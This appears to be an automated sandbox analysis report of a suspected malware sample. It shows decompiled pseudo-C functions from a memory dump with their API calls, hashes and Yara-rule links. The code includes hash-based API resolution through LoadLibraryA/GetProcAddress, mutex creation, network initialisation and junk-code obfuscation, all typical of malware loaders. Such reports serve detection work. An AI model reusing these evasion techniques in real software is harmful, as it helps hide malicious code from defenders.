API ID: AdjustInfoLibraryLoadNamedPrivilegesSecurityToken
String ID:
API String ID: 2785814242-0
Opcode ID: 53d3e8d696b554b7c62aea9b8f815d1285d86a263c3720ca7b5fc58d2305688d
Instruction ID: d0b0b4c89df3dddfb10bebbd31f6cbdb2178e57db3e88d39798a30296292a3ab
Opcode Fuzzy Hash: 53d3e8d696b554b7c62aea9b8f815d1285d86a263c3720ca7b5fc58d2305688d
Instruction Fuzzy Hash: E721D8B2E402197BEF1066A0AC13FFF36689B11714F050434FA18B6283F5A16A1487F2

Uniqueness

Uniqueness Score: -1.00%

Function 000A2F00, Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E000A2F00(void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				intOrPtr _v52;
				char _v56;
				char _v84;
				char _v118;
				char _v160;
				intOrPtr* _t9;
				intOrPtr* _t13;
				intOrPtr* _t16;
				struct HINSTANCE__* _t17;
				WCHAR* _t19;
				struct HWND__* _t22;
				char* _t25;

				_t36 = __eflags;
				_t25 =  &_v56;
				E000A8F20(_t25, 0x28);
				_v52 = E000A1070;
				_t9 = E0009BF50(__eflags, 0, 0xa39ecc7);
				_v40 =  *_t9(0);
				_v20 = E00097200(0xb0c10,  &_v118);
				_t13 = E0009BF50(_t36, 1, 0x38227e7);
				 *_t13(_t25);
				E0009BF50(_t36, 1, 0xf3c7b77);
				_t16 = E0009BF50(_t36, 0, 0xa39ecc7);
				_t17 =  *_t16(0);
				_t19 = E00097200(0xb0790,  &_v84);
				_t22 = CreateWindowExW(0, E00097200(0xb0c10,  &_v160), _t19, 0xcf0000, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, _t17, 0); // executed
				return _t22;
			}

0x000a2f00
0x000a2f0c
0x000a2f12
0x000a2f1a
0x000a2f28
0x000a2f34
0x000a2f48
0x000a2f52
0x000a2f5b
0x000a2f64
0x000a2f75
0x000a2f7f
0x000a2f8c
0x000a2fce
0x000a2fda

APIs

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

CreateWindowExW.USER32(00000000,00000000,00000000,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000A2FCE

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateLibraryLoadWindow
String ID:
API String ID: 4174337752-0
Opcode ID: b33be60579bcbc8d244ce09eea1e3476b85ed4de72df16617eecf2a092608ca4
Instruction ID: 8cf9f4e8ccaace393dda7e269f6ab2b87a3cdffb05642fcb61ba9ad7d9cde57a
Opcode Fuzzy Hash: b33be60579bcbc8d244ce09eea1e3476b85ed4de72df16617eecf2a092608ca4
Instruction Fuzzy Hash: EA111277E942187AF76066F06C03FEE76589B51B15F240125FF0C79283EAD12A1446B6

Uniqueness

Uniqueness Score: -1.00%

Function 00091490, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00091490(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, signed char _a20, signed char _a24) {
				signed int _v20;
				char _v540;
				void* _t16;
				long _t23;
				intOrPtr* _t25;
				void* _t26;
				signed int _t27;
				signed int _t28;
				signed int _t30;
				void* _t31;
				void* _t33;

				_t27 = _a20 & 0x000000ff;
				_t28 = 0;
				_v20 = _a24 & 0x000000ff;
				do {
					_t14 =  &_v540;
					E00095CD0(_t35, _a4,  &_v540, _t27, _v20);
					_t16 = E000A8960(_a12, _a8, _t14);
					_t33 = _t31 + 0x1c;
					if(_t16 == 0) {
						goto L2;
					}
					_t37 = _a16;
					if(_a16 == 0) {
						L1:
						E0009BF50(__eflags, 0, 0xbf8ba27);
						_t33 = _t33 + 8;
						_t23 = GetFileAttributesW(_a12); // executed
						__eflags = _t23 - 0xffffffff;
						if(__eflags == 0) {
							return 1;
						}
						goto L2;
					}
					_t25 = E0009BF50(_t37, 3, 0xd85c117);
					_t33 = _t33 + 8;
					_t26 =  *_t25(_a12, _a16);
					_t38 = _t26;
					if(_t26 != 0) {
						goto L1;
					}
					L2:
					_t30 = E000922E0(_t38, 0,  !_t28);
					E00091460(_t38, _t28, 1);
					_t31 = _t33 + 0x10;
					_t35 = _t30 - 0x64;
					_t28 = _t30;
				} while (_t30 != 0x64);
				return 0;
			}

0x000914a0
0x000914a4
0x000914a6
0x000914ec
0x000914f0
0x000914fc
0x0009150b
0x00091510
0x00091515
0x00000000
0x00000000
0x00091517
0x0009151b
0x000914b0
0x000914b7
0x000914bc
0x000914c2
0x000914c4
0x000914c7
0x00000000
0x00091542
0x00000000
0x000914c7
0x00091524
0x00091529
0x00091532
0x00091534
0x00091536
0x00000000
0x00000000
0x000914c9
0x000914d8
0x000914dd
0x000914e2
0x000914e5
0x000914e8
0x000914e8
0x00000000

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
Instruction ID: 03da179e66cfeac96f9f0c36ae48a9726aeeea956ce1e1fcd64655db540d2e03
Opcode Fuzzy Hash: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
Instruction Fuzzy Hash: 67113D72A4021A7BDF112E61AC02BFE3A699F55765F050120FC29A51D3F532CE20B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 000AB710, Relevance: 1.6, APIs: 1, Instructions: 50
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000AB710(void* __eflags, struct _SECURITY_ATTRIBUTES* _a4, WCHAR* _a8, intOrPtr _a12) {
				void* _t5;
				intOrPtr* _t8;
				void* _t10;
				intOrPtr* _t11;
				void* _t15;
				void* _t17;

				E0009BF50(__eflags, 0, 0xee41457);
				_t5 = CreateMutexW(_a4, 0, _a8); // executed
				_t17 = 0;
				_t25 = _t5;
				if(_t5 != 0) {
					_t15 = _t5;
					_t8 = E0009BF50(_t25, 0, E00099D50(0x640dea48));
					_t10 = E00093750(_t25,  *_t8(_t15, _a12), 0xffffff7f);
					_t26 = _t10;
					if(_t10 == 0) {
						_t17 = _t15;
					} else {
						_t11 = E0009BF50(_t26, 0, 0xb8e7db5);
						 *_t11(_t15);
					}
				}
				return _t17;
			}

0x000ab723
0x000ab72f
0x000ab731
0x000ab733
0x000ab735
0x000ab73a
0x000ab74c
0x000ab75e
0x000ab766
0x000ab768
0x000ab77e
0x000ab76a
0x000ab771
0x000ab77a
0x000ab77a
0x000ab768
0x000ab786

APIs

CreateMutexW.KERNEL32(?,00000000,000B2850,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000AB72F

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateLibraryLoadMutex
String ID:
API String ID: 427046056-0
Opcode ID: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
Instruction ID: e1a553a33ae1fcedd2996e0e2f1cc664e70b3df4c43124e9b37a272d12d64a21
Opcode Fuzzy Hash: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
Instruction Fuzzy Hash: E7F062ABA4521837EA1025F57C53FBF724C8BD2B66F050020FE1CA7287EA91AD0056F2

Uniqueness

Uniqueness Score: -1.00%

Function 00098290, Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00098290(intOrPtr _a4) {
				void* _t4;
				long _t6;
				void* _t8;
				intOrPtr _t9;

				_t9 = _a4;
				_t19 = _t9;
				if(_t9 == 0) {
					__eflags = 0;
					return 0;
				}
				_t4 = E00091460(_t19, _t9, E00099D50(0x1bde8cd4));
				_t6 = E000922E0(_t19, _t4 + 4, E00099D50(0x1bde8cd4));
				E0009BF50(_t19, 0, 0x8685de3);
				_t8 = RtlAllocateHeap( *0xb2124, 8, _t6); // executed
				return _t8;
			}

0x00098294
0x00098297
0x00098299
0x000982ec
0x00000000
0x000982ec
0x000982aa
0x000982c6
0x000982d7
0x000982e8
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000982E8

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7e459e1d3ec2232cc4591ea6ce7c0c7c6018a9fad2a67d1224fd1219211554c8
Instruction ID: b47334337243ddb6a87379554c9306c69a174ebb3430ee892321c1dcaa6944d1
Opcode Fuzzy Hash: 7e459e1d3ec2232cc4591ea6ce7c0c7c6018a9fad2a67d1224fd1219211554c8
Instruction Fuzzy Hash: D1E03067D525257BE95132A47C03AEB35484B137BAF0A0130FD0DB6243E9426A1423FB

Uniqueness

Uniqueness Score: -1.00%

Function 000AC210, Relevance: 1.5, APIs: 1, Instructions: 26
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000AC210(void* __eflags) {
				char _v408;
				intOrPtr* _t2;
				signed short _t3;
				void* _t5;

				_t2 = E0009BF50(__eflags, 6, 0xaaf7240); // executed
				_t3 = E00099BA0(_t2, 0x2ae);
				_t5 =  *_t2(_t3 & 0x0000ffff,  &_v408); // executed
				return E000955C0(_t5, 0) & 0x00000001;
			}

0x000ac221
0x000ac230
0x000ac243
0x000ac25a

APIs

WSAStartup.WS2_32(?,?), ref: 000AC243

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
Instruction ID: d5895b9e638ac6411623dac02507ec4e805386f91435ba691547b838b3c06b0e
Opcode Fuzzy Hash: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
Instruction Fuzzy Hash: 2AE086B2D4031437E92071B57C27FF636484711725F450060FE4C551C3F456662891F6

Uniqueness

Uniqueness Score: -1.00%

Function 000A0390, Relevance: 1.5, APIs: 1, Instructions: 26
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A0390(void* __eax) {
				void _v12;
				void* _t4;
				int _t7;
				void* _t15;

				_v12 = 0xa;
				_t4 = E00099D50(0x647400bf);
				E0009BF50(_t15, _t4, E00099D50(0x61c0d6ad));
				_t7 = InternetSetOptionA(0, 0x49,  &_v12, 4); // executed
				return _t7;
			}

0x000a0395
0x000a03a1
0x000a03ba
0x000a03cc
0x000a03d3

APIs

InternetSetOptionA.WININET(00000000,00000049,?,00000004,?,?,?,0009C94D), ref: 000A03CC

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: InternetOption
String ID:
API String ID: 3327645240-0
Opcode ID: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
Instruction ID: 1a323cbb603b15f59ad3f8e310fef35c1e3c6bf861833f074b03d76a9f13790f
Opcode Fuzzy Hash: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
Instruction Fuzzy Hash: 41E08CE6D812143AEA1062D4BC53FFB355C8B12729F050074FA0DA5283F5A666148AE3

Uniqueness

Uniqueness Score: -1.00%

Function 000A8F40, Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E000A8F40(intOrPtr _a4, intOrPtr _a8, signed char _a12, signed char _a16, char _a20) {
				char _t8;
				signed int _t11;
				signed int _t13;
				char _t14;
				void* _t15;

				if(_a8 == 0) {
					L7:
					return _t8;
				}
				_t13 = _a16 & 0x000000ff;
				_t11 = _a12 & 0x000000ff;
				_t14 = 0;
				_t18 = 0;
				if(0 != 0) {
					L5:
					_t18 = _a20;
					if(_a20 != 0) {
						E0009BF50(_t18, 0, 0x7a2bc0);
						_t15 = _t15 + 8;
						Sleep(0x14); // executed
					}
					while(1) {
						L3:
						 *((char*)(_a4 + _t14)) = E0009D620(_t11, _t13);
						_t8 = E00091460(_t18, _t14, 1);
						_t15 = _t15 + 0x10;
						_t14 = _t8;
						if(_t8 == _a8) {
							goto L7;
						}
						if(_t14 == 0) {
							continue;
						}
						goto L5;
					}
					goto L7;
				}
				goto L3;
			}

0x000a8f4a
0x000a8fa5
0x000a8fa5
0x000a8fa5
0x000a8f4c
0x000a8f50
0x000a8f54
0x000a8f56
0x000a8f58
0x000a8f86
0x000a8f86
0x000a8f8a
0x000a8f93
0x000a8f98
0x000a8f9d
0x000a8f9d
0x000a8f60
0x000a8f60
0x000a8f6d
0x000a8f73
0x000a8f78
0x000a8f7e
0x000a8f80
0x00000000
0x00000000
0x000a8f84
0x00000000
0x00000000
0x00000000
0x000a8f84
0x00000000
0x000a8f60
0x00000000

APIs

Sleep.KERNEL32(00000014), ref: 000A8F9D

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
Instruction ID: 17ab3fad13c1647c9a5e7415fb4f31298057cfe3b74b0d69370ef050f416eea8
Opcode Fuzzy Hash: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
Instruction Fuzzy Hash: F8F02B72D453AE3ECF311AA0AC45FEE7B854B87BA9F194131FC4929283D961895083F1

Uniqueness

Uniqueness Score: -1.00%

Function 0009B570, Relevance: 1.3, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0009B570(void* _a4) {
				void* _t2;
				int _t4;
				void* _t5;

				_t5 = _a4;
				_t8 = _t5;
				if(_t5 != 0) {
					E0009BF50(_t8, 0, 0xb86de55);
					_t4 = HeapFree( *0xb2124, 0, _t5); // executed
					return _t4;
				}
				return _t2;
			}

0x0009b574
0x0009b577
0x0009b579
0x0009b582
0x0009b593
0x00000000
0x0009b593
0x0009b597

APIs

HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0e6dac1c9f28517e7a7f85ec535248eb572c6a1681859f4483bf8789543ff126
Instruction ID: 12d17eef5bec0ac8183a723a808ff7b064c40324a5c7f0ce1e0f05c7f8cd6a9d
Opcode Fuzzy Hash: 0e6dac1c9f28517e7a7f85ec535248eb572c6a1681859f4483bf8789543ff126
Instruction Fuzzy Hash: 9CD01273A8532877DA212A95BD07FDA7B5C8B15FB1F090021FE0C7B251A692791056E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0009D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0009D830(signed int _a4, intOrPtr _a8) {
				signed short* _v20;
				CHAR* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v140;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t93;
				signed short* _t100;
				signed short* _t102;
				void* _t105;
				void* _t112;
				char _t113;
				signed short* _t114;
				void* _t115;
				void* _t120;
				signed int _t122;
				signed int _t124;
				signed int _t133;
				void* _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t139;
				_Unknown_base(*)()* _t141;
				char* _t143;
				signed int _t144;
				void* _t149;
				signed short* _t153;
				signed int _t155;
				intOrPtr _t159;
				void* _t160;
				signed char* _t161;
				void* _t165;
				intOrPtr _t166;
				_Unknown_base(*)()* _t170;
				signed short* _t173;
				CHAR* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t183;
				void* _t187;
				void* _t191;
				void* _t192;
				void* _t199;

				_t133 = _a4;
				_t141 = 0;
				_t204 = _t133;
				if(_t133 != 0) {
					_t78 = E000A12D0(_t204, _t133);
					_t149 = _t78;
					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
					_t79 = E00099D50(0x975b6640);
					_t141 = 0;
					_t180 = _t178 + 8;
					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
						_t6 = _t165 + 0xcd09914; // 0xcd09914
						_t166 = _t79 + _t6;
						_v36 =  *((intOrPtr*)(_t149 + 0x64));
						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E00099D50(0x60421690) + 0x436163c;
						_v32 = _t166;
						_t83 = E00091460(_t205, E00091460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
						_t183 = _t180 + 0x14;
						_v40 =  ~_t133;
						_t143 = _t83 + 0xa1511d8c;
						_t135 = 0;
						0;
						do {
							_v20 = _t153;
							_v24 = _t143;
							_t155 =  ~(E00091460(0,  ~( *_t143), _v40));
							E00091460(0,  *_t143, _a4);
							E000A8F20( &_v140, E00099D50(0x647400c8));
							_t187 = _t183 + 0x1c;
							_t91 =  *_t155;
							if( *_t155 != 0) {
								_t176 = 0;
								do {
									 *((char*)(_t177 + _t176 - 0x88)) = E000AD680(0, _t91);
									_t176 = _t176 - E000922E0(0, 0, 1);
									E00091460(0, _t176, 1);
									_t187 = _t187 + 0x14;
									_t91 =  *(_t155 + _t176) & 0x000000ff;
								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
							}
							_push(0xffffffff);
							_t93 = E000A00A0( &_v140);
							_t183 = _t187 + 8;
							if(_t93 == _a8) {
								_t136 = _v32;
								_t170 = E00091460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E00099D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
								_t100 = E000922E0(__eflags, _t136, 0x52cc09fc);
								_t159 = _v36;
								_v20 = _t100;
								E00091460(__eflags, _t136, _t159);
								_t141 = _t170;
								_t191 = _t183 + 0x1c;
								__eflags = _t170 - _t136;
								if(_t170 > _t136) {
									_t102 = _v20;
									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
										_v24 =  *_t141;
										_v20 = _t141;
										_t105 = E00097DD0(0x82);
										_t192 = _t191 + 4;
										_t144 = _v24;
										_t137 = 0;
										__eflags = _t144 - _t105;
										if(_t144 != _t105) {
											_t122 = _t144;
											_t175 = 0;
											__eflags = 0;
											0;
											do {
												 *(_t177 + _t175 - 0x88) = _t122;
												_t124 = E00091460(__eflags, E000922E0(__eflags, 0, _t175), 0xffffffff);
												_t137 =  ~_t124;
												E00091460(__eflags, _t175, 1);
												_t192 = _t192 + 0x18;
												_t175 = _t137;
												_t122 =  *(_v20 - _t124) & 0x000000ff;
												__eflags = _t122 - 0x2e;
											} while (__eflags != 0);
										}
										_t160 = E00091460(__eflags, _t137, E00099D50(0x3638cbc4));
										E00091460(__eflags, _t137, 1);
										_v24 = _v20 + _t160 - 0x524ccb67;
										 *((char*)(_t177 + _t137 - 0x88)) = E00097DD0(0x82);
										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
										_t112 = E00099D50(0x8707952b);
										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
										_t113 = E00097DD0(0xc0);
										_v28 = 0;
										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
										_t114 = _v20;
										 *((char*)(_t177 + _t137 - 0x84)) = 0;
										_t173 = _t114;
										_t115 = E00097DD0(0x8f);
										_t199 = _t192 + 0x24;
										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
											_t174 = _v24;
										} else {
											_t139 = _v24[1];
											__eflags = _t139;
											if(_t139 == 0) {
												_t174 =  &_v28;
											} else {
												_t161 = _t160 + _t173 - 0x524ccb65;
												do {
													_t120 = E000955A0(_v28, 0xa);
													_t199 = _t199 + 8;
													_v28 = _t139 + _t120 - 0x30;
													_t139 =  *_t161 & 0x000000ff;
													_t161 =  &(_t161[1]);
													__eflags = _t139;
												} while (_t139 != 0);
												_t174 =  &_v28;
											}
										}
										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
									}
								}
							} else {
								goto L7;
							}
							goto L22;
							L7:
							_t135 = _t135 + 1;
							_t143 =  &(_v24[4]);
							_t153 =  &(_v20[1]);
						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
						_t141 = 0;
					}
				}
				L22:
				return _t141;
			}

0x0009d839
0x0009d83c
0x0009d83e
0x0009d840
0x0009d847
0x0009d852
0x0009d854
0x0009d85b
0x0009d860
0x0009d862
0x0009d865
0x0009d86d
0x0009d873
0x0009d873
0x0009d880
0x0009d894
0x0009d89f
0x0009d8af
0x0009d8b4
0x0009d8bb
0x0009d8be
0x0009d8c4
0x0009d8cc
0x0009d8d0
0x0009d8d2
0x0009d8d5
0x0009d8ea
0x0009d8f0
0x0009d90d
0x0009d912
0x0009d915
0x0009d919
0x0009d91b
0x0009d920
0x0009d92c
0x0009d942
0x0009d944
0x0009d949
0x0009d94c
0x0009d950
0x0009d920
0x0009d954
0x0009d95d
0x0009d962
0x0009d968
0x0009d98d
0x0009d9c4
0x0009d9d0
0x0009d9d8
0x0009d9db
0x0009d9e0
0x0009d9e5
0x0009d9e7
0x0009d9ea
0x0009d9ec
0x0009d9f2
0x0009d9fc
0x0009d9fe
0x0009da06
0x0009da0e
0x0009da11
0x0009da16
0x0009da19
0x0009da1c
0x0009da1e
0x0009da20
0x0009da22
0x0009da24
0x0009da24
0x0009da2c
0x0009da30
0x0009da30
0x0009da45
0x0009da51
0x0009da56
0x0009da5b
0x0009da61
0x0009da65
0x0009da68
0x0009da68
0x0009da30
0x0009da83
0x0009da88
0x0009da9a
0x0009daaa
0x0009dab1
0x0009dabe
0x0009dac8
0x0009dad7
0x0009dae5
0x0009daec
0x0009daf3
0x0009daf6
0x0009db05
0x0009db0c
0x0009db11
0x0009db14
0x0009db16
0x0009db54
0x0009db18
0x0009db1e
0x0009db21
0x0009db23
0x0009db59
0x0009db25
0x0009db25
0x0009db30
0x0009db35
0x0009db3a
0x0009db44
0x0009db47
0x0009db4a
0x0009db4b
0x0009db4b
0x0009db4f
0x0009db4f
0x0009db23
0x0009db70
0x0009db70
0x0009d9fe
0x00000000
0x00000000
0x00000000
0x00000000
0x0009d96a
0x0009d973
0x0009d974
0x0009d977
0x0009d97a
0x0009d983
0x0009d983
0x0009d86d
0x0009db72
0x0009db7b

APIs

LoadLibraryA.KERNEL32(?), ref: 0009DB62
GetProcAddress.KERNEL32(00000000,?), ref: 0009DB6A

Strings

d, xrefs: 0009DAB1
l, xrefs: 0009DAC8

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AddressLibraryLoadProc
String ID: d$l
API String ID: 2574300362-91452987
Opcode ID: e2a66a7f29839d7ee876785f66da9d4f7e3b194f6b603531649ba7ce79ef0c6e
Instruction ID: 6eca26b2e0120264f5b23545452b970cb6935aa484fee8db310441e1e39abbb3
Opcode Fuzzy Hash: e2a66a7f29839d7ee876785f66da9d4f7e3b194f6b603531649ba7ce79ef0c6e
Instruction Fuzzy Hash: CB9119B6D402159BDF109FB4AC82AFE7BB4AF16358F090065FC49B7343E6319A14D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 000A69A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A69A0(void* __eflags) {
				intOrPtr _v32;
				signed int _v36;
				void* _v44;
				signed char _t13;
				signed int _t16;
				signed int _t19;
				long _t23;
				void* _t24;
				void* _t25;
				void* _t27;

				_t24 = CreateToolhelp32Snapshot(4, 0);
				_v44 = E00099D50(0x647400b0);
				_t23 = GetCurrentProcessId();
				_t13 = E000955C0(Thread32First(_t24,  &_v44), 0);
				_t27 = _t25 + 0xc;
				if((_t13 & 0x00000001) != 0) {
					L6:
					_t19 = 0;
				} else {
					0;
					0;
					while(GetLastError() != 0x12) {
						_t16 = E000955C0(_v32, _t23);
						_t27 = _t27 + 8;
						_t19 =  ~(_t16 & 0x00000001) & _v36;
						if(Thread32Next(_t24,  &_v44) != 0) {
							if(_t19 == 0) {
								continue;
							} else {
							}
						}
						goto L7;
					}
					goto L6;
				}
				L7:
				return _t19;
			}

0x000a69b2
0x000a69c1
0x000a69ca
0x000a69d9
0x000a69de
0x000a69e3
0x000a6a25
0x000a6a25
0x000a69eb
0x000a69eb
0x000a69ef
0x000a69f0
0x000a69ff
0x000a6a04
0x000a6a11
0x000a6a1d
0x000a6a21
0x00000000
0x00000000
0x000a6a23
0x000a6a21
0x00000000
0x000a6a1d
0x00000000
0x000a69f0
0x000a6a27
0x000a6a30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000A69AD
GetCurrentProcessId.KERNEL32 ref: 000A69C4
Thread32First.KERNEL32(00000000,?), ref: 000A69D1
GetLastError.KERNEL32 ref: 000A69F0
Thread32Next.KERNEL32(00000000,?), ref: 000A6A16

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
String ID:
API String ID: 1709709923-0
Opcode ID: a5d2626746ee28409eea80e0be773af7b85a77519e888a0b7592b8809c3b9075
Instruction ID: 22550d9d978fb53d7757af38329ec937254bd234e22e72e960605e5c38966302
Opcode Fuzzy Hash: a5d2626746ee28409eea80e0be773af7b85a77519e888a0b7592b8809c3b9075
Instruction Fuzzy Hash: 5801F2B29503046BEB117BF4AC96FFF3A7CEF53315F480130FA04A2123E91A990486B2

Uniqueness

Uniqueness Score: -1.00%

Function 00092340, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00092340(char _a4) {
				signed int _v20;
				struct HDC__* _v24;
				signed int _v28;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				struct HWND__* _t32;
				int _t34;
				struct HWND__* _t35;
				signed int _t36;
				signed int _t39;
				int _t42;
				signed int _t48;
				signed int _t49;
				signed int _t54;
				void* _t56;
				signed int _t58;
				int _t59;

				_t1 =  &_a4; // 0x92f73
				_t56 =  *_t1;
				_t34 = _t56 & 0x00000100;
				RegEnumValueW(_t56, _t34, _t34, _t56 & 0xfffffeff, _t34, _t56 & 0xfffffeff, _t56, _t34);
				_t35 = _t34 * _t56;
				_t39 = 0;
				if(_t35 != _t56) {
					_t36 = _t35 | _t56;
					_t32 = _t36 * _t56;
					_t39 = _t36 * _t32 | _t32;
					_t35 = _t32;
				}
				_t54 = _t39 ^ _t56;
				DestroyWindow(_t35);
				_t58 = _t39 * _t54;
				_v20 = _t58;
				_t3 =  &_a4; // 0x92f73
				_t59 =  *_t3;
				_t42 = _t58 - _t59;
				if(_t59 == 0xaec9ea02 && _t35 != 0xaec9ea02) {
					_t48 = _t42 * _t35;
					_t5 = _t54 - 0x513615fe; // -1362499070
					_t49 = _t48 + _t5;
					_t42 = _t48 + 0xaec9ea02;
					_v24 = _t49;
					_t28 = _t54 * _t49;
					_v28 = _t28;
					_t29 = _t28 + 0xc9;
					_t30 = _t29 * _t35;
					_t35 = _t29 * _t35 >> 0x20;
					_v20 = _t30;
				}
				if(_t35 >= _t59 && _t42 != _t59) {
					MoveToEx(_v24, _t59, _t42, _t59);
					return ((_v28 ^ (_t35 + _v20 & 0x000000ff) * 0xffffffe3) << 0x18) + 0x2a000000 >> 0x18;
				}
				return 0;
			}

0x00092349
0x00092349
0x0009234e
0x00092363
0x00092369
0x0009236c
0x00092370
0x00092372
0x00092376
0x0009237e
0x00092381
0x00092381
0x00092385
0x0009238a
0x00092390
0x00092393
0x00092398
0x00092398
0x0009239e
0x000923a6
0x000923b2
0x000923b5
0x000923b5
0x000923bc
0x000923c2
0x000923c5
0x000923c8
0x000923d0
0x000923d2
0x000923d4
0x000923d6
0x000923d6
0x000923e2
0x000923ee
0x00000000
0x00092410
0x00092419

APIs

RegEnumValueW.ADVAPI32(s/,s/,s/,s/,s/,s/,s/,s/,?,00092F73,?,?,?,?,?,0009AE51), ref: 00092363
DestroyWindow.USER32 ref: 0009238A
MoveToEx.GDI32(00000000,s/,00000000,s/), ref: 000923EE

Strings

s/, xrefs: 00092349, 00092398, 0009235B, 0009235C, 0009235D, 0009235E, 0009235F, 00092360, 00092361, 00092362, 00092387, 000923E8, 000923EA

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: DestroyEnumMoveValueWindow
String ID: s/
API String ID: 1329181790-3258355666
Opcode ID: ea71abc9060870624eee78be531de38e292de3fa50a3bda0095037a54bc3101b
